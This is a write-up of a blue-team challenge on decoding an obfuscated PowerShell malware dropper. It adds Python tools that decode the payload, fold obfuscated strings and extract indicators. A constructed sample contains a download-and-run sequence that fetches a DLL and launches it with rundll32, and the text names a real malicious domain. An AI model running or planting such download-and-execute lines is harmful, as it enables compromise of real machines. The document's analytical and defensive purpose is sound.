BTLO — Malicious PowerShell Analysis
Recently the networks of a large company named GothamLegend were compromised after an employee opened a phishing email containing malware. The damage caused was critical and resulted in business-wide disruption. GothamLegend had to reach out to a third-party incident response team to assist with the investigation. You are a member of the IR team — all you have is an encoded PowerShell script. Can you decode it and identify what malware is responsible for this attack?
Download the .zip and enter the password btlo to access the files.
This challenge requires analysis of a PowerShell script. CyberChef is often a useful tool for this sort of analysis.
POwersheLL -w hidden means that a hidden PowerShell window (invisible to the user) is opened, and -ENCOD, an abbreviation of the -EncodedCommand parameter, shows that the script that follows is Base64 encoded. The odd capitalisation is cosmetic: PowerShell treats the executable name and its parameter names case-insensitively, so it only serves to dodge simple string matching.
What security protocol is being used for the communication with a malicious domain?
The first thing to do is recognise that the PowerShell payload is Base64 encoded. We can get past this easily with From Base64 in CyberChef. I like to use Regular Expression to extract the encoded string, but it can just be copied directly. After decoding, it looks pretty messed up and clearly obfuscated. The null byte after every character is there because -EncodedCommand payloads are UTF-16LE text, so Remove null bytes (or decoding the bytes as UTF-16LE) followed by Generic Code Beautify will help with readability a little bit.
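To show what the CyberChef steps above do under the hood, here is an added Python example (not part of the original writeup) that pulls the -EncodedCommand payload out of a command line, confirms the UTF-16LE layout that produces the null bytes, decodes it, and picks out the SecurityProtocol setting. The command line it works on is constructed for the example, not the challenge's real one.

```python
import base64
import re

# Constructed sample standing in for the challenge's real command line; the script
# inside only sets the TLS version, which is the first artefact the writeup spots.
SAMPLE_SCRIPT = "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12"
SAMPLE_CMDLINE = "POwersheLL -w hidden -ENCOD " + base64.b64encode(
    SAMPLE_SCRIPT.encode("utf-16-le")).decode("ascii")


def extract_encoded_payload(cmdline):
    """Return the Base64 blob that follows -EncodedCommand.
    PowerShell accepts any unambiguous prefix of a parameter name (-e, -enc, -ENCOD)
    and the -ec alias, all case-insensitively, so match on that rule, not one spelling."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok[1:].lower() if tok.startswith("-") else ""
        if name and ("encodedcommand".startswith(name) or name == "ec"):
            return tokens[i + 1].strip("'\"")
    return None


def is_utf16le_ascii(payload):
    """True when every second byte of the decoded blob is NUL, i.e. ASCII text stored
    as UTF-16LE. Those NULs are what 'Remove null bytes' strips in CyberChef."""
    raw = base64.b64decode(payload)
    return len(raw) % 2 == 0 and all(b == 0 for b in raw[1::2])


def decode_encoded_command(payload):
    """-EncodedCommand payloads are UTF-16LE, so decode as such instead of stripping NULs."""
    return base64.b64decode(payload).decode("utf-16-le")


def find_security_protocol(script):
    """Locate the SecurityProtocol assignment and return the protocol name (e.g. Tls12).
    Tolerates the dropped dots and mangled casing the writeup mentions."""
    m = re.search(r"Security\s*Protocol.*?\b(Tls1[0-3]|Tls|Ssl3)\b", script, re.I | re.S)
    return m.group(1) if m else None


if __name__ == "__main__":
    payload = extract_encoded_payload(SAMPLE_CMDLINE)
    print("UTF-16LE layout:", is_utf16le_ascii(payload))        # True
    script = decode_encoded_command(payload)
    print(script)
    print("SecurityProtocol:", find_security_protocol(script))  # Tls12
```

Decoding as UTF-16LE directly gives the same text CyberChef produces after From Base64 plus Remove null bytes, without the risk of that step also eating legitimate characters.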
The next step is to work out what is going on. Some of the . characters are removed as part of removing null bytes or by the regex, but we can still spot the reference to Security Protocol and work out the type: TLS 1.2.
What directory does the obfuscated PowerShell create? (Starting from \HOME\)
Again, we can read through the obfuscated decoded script and locate something that resembles \HOME\. This is unfortunately too obfuscated to uncover at a glance, but we can take it over to an editor such as https://code.visualstudio.com/ or https://notepad-plus-plus.org/ and manually deobfuscate it.
It looks to be relatively simple string concatenation, with UOH (set to [string][char]92, which is \) substituted for each {0} placeholder by the -f format operator. I added a commented line below to help determine the path.
A quicker way to do this would be to copy the extracted string-building expression into PowerShell and let it assemble the path for us (only that expression, and inside an isolated analysis VM, since this is still running a piece of the attacker's code).
What file is being downloaded (full name)?
Following a similar process, we see string concatenation again, but this time with variable references mixed in too.
What is used to execute the downloaded file?
The file is a .dll. A DLL is a library containing code and data that carries out a particular activity in support of an .exe. Normally an .exe calls a .dll, but a DLL's exported functions can also be run standalone through rundll32.exe, and we see evidence of this within the script.
What is the domain name of the URI ending in ‘/6F2gd/’?
It looks like the URI string is a pretty long obfuscated string to work through. It might be easier to find/replace ', space and + with blank characters to see what we're left with. This isn't perfect, but it gives a much clearer indication of what the URI ending in /6F2gd/ is.
Again, an even easier way to do this is to paste the string into PowerShell and see if it can deobfuscate it for us. The one we're looking for is there at the end.
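Rather than pasting attacker code into PowerShell, the same constant folding can be done by an evaluator that knows only the string-building subset of the language. The added Python example below (not part of the original writeup) handles the three constructs the directory, file name and URI questions relied on: single-quoted string concatenation with +, the -f format operator with {0} placeholders and [string][char]92, and references to variables assigned earlier in the script. It runs the find/replace shortcut alongside so the difference is visible. The two scripts it folds are constructed samples shaped like the challenge's obfuscation; the variable names, the path under \HOME\ and the reserved example domain are invented.

```python
import re

# Token classes of the string-building PowerShell subset this obfuscator relies on.
TOKEN_RE = re.compile(
    r"(?P<ws>\s+)"
    r"|(?P<str>'(?:[^']|'')*')"                       # single-quoted string, '' escapes '
    r"|(?P<num>\d+)"
    r"|(?P<cast>\[(?:string|char)\])"
    r"|(?P<var>\$(?:\{[A-Za-z_]\w*\}|[A-Za-z_]\w*))"  # $name or ${name}
    r"|(?P<fmt>-f\b)"                                 # format operator
    r"|(?P<op>[+(),=])",
    re.IGNORECASE,
)

def tokenize(line):
    tokens, pos = [], 0
    while pos < len(line):
        m = TOKEN_RE.match(line, pos)
        if not m:
            raise ValueError(f"unsupported syntax at {pos}: {line[pos:pos + 20]!r}")
        pos = m.end()
        if m.lastgroup != "ws":
            tokens.append((m.lastgroup, m.group()))
    return tokens

class MiniPS:
    """Folds string constants the way PowerShell would, executing nothing else.
    Variable names are case-insensitive, '+' is left-associative, -f binds tighter than '+'."""

    def __init__(self):
        self.vars = {}

    def run(self, script):
        """Assignments populate self.vars; the value of every bare expression line is returned."""
        results = []
        for line in script.splitlines():
            if not line.strip():
                continue
            self.toks, self.i = tokenize(line), 0
            if len(self.toks) > 2 and self.toks[0][0] == "var" and self.toks[1] == ("op", "="):
                self.i = 2
                self.vars[self.toks[0][1].strip("${}").lower()] = self._expr()
            else:
                results.append(self._expr())
            if self.i != len(self.toks):
                raise ValueError(f"trailing tokens in {line!r}")
        return results

    def _peek(self, kind, text=None):
        if self.i >= len(self.toks):
            return False
        k, t = self.toks[self.i]
        return k == kind and (text is None or t == text)

    def _take(self):
        if self.i >= len(self.toks):
            raise ValueError("unexpected end of line")
        self.i += 1
        return self.toks[self.i - 1]

    def _expr(self):
        value = self._fmt()
        while self._peek("op", "+"):
            self._take()
            rhs = self._fmt()
            value = value + str(rhs) if isinstance(value, str) else value + rhs
        return value

    def _fmt(self):
        value = self._atom()
        if self._peek("fmt"):
            self._take()
            args = [self._atom()]
            while self._peek("op", ","):
                self._take()
                args.append(self._atom())
            value = str(value).format(*args)   # '{0}..{1}' -f a, b is String.Format
        return value

    def _atom(self):
        kind, text = self._take()
        if kind == "str":
            return text[1:-1].replace("''", "'")
        if kind == "num":
            return int(text)
        if kind == "var":
            return self.vars[text.strip("${}").lower()]
        if kind == "cast":
            inner = self._atom()
            return chr(int(inner)) if text.lower() == "[char]" else str(inner)
        if kind == "op" and text == "(":
            value = self._expr()
            if not self._peek("op", ")"):
                raise ValueError("expected ')'")
            self._take()
            return value
        raise ValueError(f"unexpected token {text!r}")

def naive_strip(text):
    """The find/replace shortcut from the writeup: drop quotes, spaces and '+'.
    Fine for plain concatenation; leaves -f placeholders and variables unresolved."""
    return text.replace("'", "").replace(" ", "").replace("+", "")

# Constructed samples shaped like the challenge's obfuscation (the real script is not
# reproduced): a \HOME\ path built with -f and [char]92, and a URL built by concatenation.
SAMPLE_PATH = """
$UOH = [string][char]92
$Tmpd = ('{0}HOME{0}DataDir{0}' -f $UOH)
$Tmpd
"""
SAMPLE_URL = """
$Dn = 'exam' + 'ple.inv' + 'alid'
('ht'+'tp://'+ $Dn +'/6F' + '2gd/')
"""

if __name__ == "__main__":
    print(MiniPS().run(SAMPLE_PATH))   # ['\\HOME\\DataDir\\']
    print(MiniPS().run(SAMPLE_URL))    # ['http://example.invalid/6F2gd/']
    print(naive_strip("('ht'+'tp://'+ $Dn +'/6F' + '2gd/')"))  # (http://$Dn/6F2gd/)
```

Anything outside this subset (double-quoted strings, method calls, -join, -replace) makes tokenize raise rather than guess, which is the behaviour you want from an analysis tool: an unsupported construct is a prompt to look at that line by hand, not to let it run.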
Based on the analysis of the obfuscated code, what is the name of the malware?
To find the name of the malware, the best place to start is to take strings that are relatively unique to the script and search for them. An easy one would be the domain identified previously, wm.mcdevelop.net.
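With the script readable, the last step is pulling out the strings worth searching on. The added Python example below (not part of the original writeup) extracts URLs, domains, DLL names, the \HOME\ directory and the rundll32 line from a constructed deobfuscated fragment, and answers the domain-for-URI question directly. The fragment uses reserved example domains and a placeholder DLL name, not the challenge's real indicators.

```python
import re

# Constructed, already-deobfuscated fragment in the shape the writeup describes: the TLS
# setting, a directory under \HOME\, a DLL written there, a download loop and rundll32.
# Domains are reserved example names and the DLL name is a placeholder.
SAMPLE_DEOBFUSCATED = r"""
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$Dir = '\HOME\DataDir\'
$Dll = $Dir + 'payload_placeholder.dll'
$Urls = 'http://example.invalid/6F2gd/','https://example.test/wp-content/'
foreach ($u in $Urls) { (New-Object Net.WebClient).DownloadFile($u, $Dll) }
rundll32.exe $Dll,AnyEntry
"""

URL_RE = re.compile(r"https?://[^\s'\"<>)]+", re.I)
DLL_RE = re.compile(r"[\w.-]+\.dll\b", re.I)
HOME_DIR_RE = re.compile(r"\\HOME\\[^'\"\s]*", re.I)
RUNDLL_RE = re.compile(r"^.*\brundll32(?:\.exe)?\b.*$", re.I | re.M)


def extract_iocs(script):
    """Pull the indicators worth pivoting on out of a deobfuscated script."""
    urls = sorted(set(URL_RE.findall(script)))
    return {
        "urls": urls,
        "domains": sorted({u.split("/")[2].lower() for u in urls}),
        "dlls": sorted(set(DLL_RE.findall(script))),
        "dirs": sorted(set(HOME_DIR_RE.findall(script))),
        "rundll32": [line.strip() for line in RUNDLL_RE.findall(script)],
    }


def domain_for_suffix(script, suffix):
    """Answer 'what is the domain of the URI ending in <suffix>' directly."""
    for u in URL_RE.findall(script):
        if u.endswith(suffix):
            return u.split("/")[2].lower()
    return None


if __name__ == "__main__":
    for key, values in extract_iocs(SAMPLE_DEOBFUSCATED).items():
        print(f"{key}: {values}")
    print("domain for /6F2gd/:", domain_for_suffix(SAMPLE_DEOBFUSCATED, "/6F2gd/"))
```

The domains and DLL name are the search terms; the directory and the rundll32 command line are what you would turn into detections on the endpoint side.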
Despite heavy obfuscation, we were able to read through the script and pull out key Indicators of Compromise, ultimately leading us to identify the name of the malware.